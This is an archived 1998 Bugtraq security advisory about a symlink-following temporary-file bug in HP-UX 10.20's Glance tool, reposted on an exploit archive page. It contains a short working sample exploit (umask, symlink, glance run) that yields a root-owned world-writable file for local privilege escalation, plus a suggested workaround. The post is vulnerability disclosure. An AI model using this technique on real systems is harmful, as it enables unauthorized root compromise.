Yet ANOTHER hole in the HP/UX Glance program
| Description: | Standard symlink-following TMPFILE stupidity |
| Author: | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> |
| Compromise: | root (local) |
| Vulnerable Systems: | HP/UX 10.20, perhaps other versions. |
| Date: | 27 April 1998 |
Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP-UX glance bug (#4?)
* Software:
HP-UX B.10.20 D
Glance.Runtime.GLANCE B.10.20.95 HP GlancePlus files
* Bug:
glance creates a /tmp/status.dce file as root, and it follows
symlinks, so you can append text like
Pid: 16208 File: ndi_sm.c Line: 2609 Mon Apr 27 21:52:23 1998
Performance Management Application registered.
--------------------------------------------------------------------------
to any system file.
* Sample exploit:
$ umask 000
$ cd /tmp
$ ln -s /.test status.dce
$ glance -j 1 -iterations 1 -maxpages 1
$ ls -l /.test
-rw-rw-rw- 1 root bar 1080 Apr 27 23:06 /.test
# edit /.test to match your needs
* Workaround:
I guess creating a non writable /tmp/status.dce file
and setting the t bit on /tmp (which it seems it has
not in the default HPUX installation) would be enough
* Note: I've been looking for HP-UX bugs, and I have found
several reported holes in glance; but it seems this one
is new...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
